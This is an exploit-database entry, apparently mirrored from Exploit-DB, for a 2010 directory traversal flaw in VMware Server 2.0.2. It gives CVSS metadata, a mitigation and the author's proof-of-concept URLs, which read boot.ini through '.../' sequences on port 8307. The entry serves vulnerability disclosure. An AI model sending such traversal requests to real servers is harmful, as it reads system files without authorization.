header-logo
Suggest Exploit
vendor:
VMware Server
by:
Alessio Dalla Piazza
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: VMware Server
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:vmware:vmware_server:2.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2010

VMware 2 Web Server Directory Traversal

A directory traversal vulnerability exists in VMware 2 Web Server, which allows an attacker to access sensitive files outside of the web root directory. By sending a specially crafted HTTP request, an attacker can traverse the directory structure and access files outside of the web root directory. This can lead to information disclosure and other attacks.

Mitigation:

Upgrade to the latest version of VMware 2 Web Server.
Source

Exploit-DB raw data:

# Exploit Title:VMware 2 Web Server Directory Traversal
# Date:15/11/2010
# Author: clshack
# Software Link: http://www.vmware.com/products/server/
# Version:2.0.2
# Tested on: windows xp sp3 en
# CVE :

VMWARE:
http://localhost:8307/

<http://localhost:8307/.../.../.../.../.../boot.ini>
http://localhost:8307/.../.../.../.../.../boot.ini

<http://localhost:8307/.../.../.../.../.../boot.ini>VMware try to load xml
...

-- 
Alessio Dalla Piazza (Personal Blog:
http://www.clshack.it)<http://www.clshack.it>

Navigation

Suggest Exploit

Services By CQR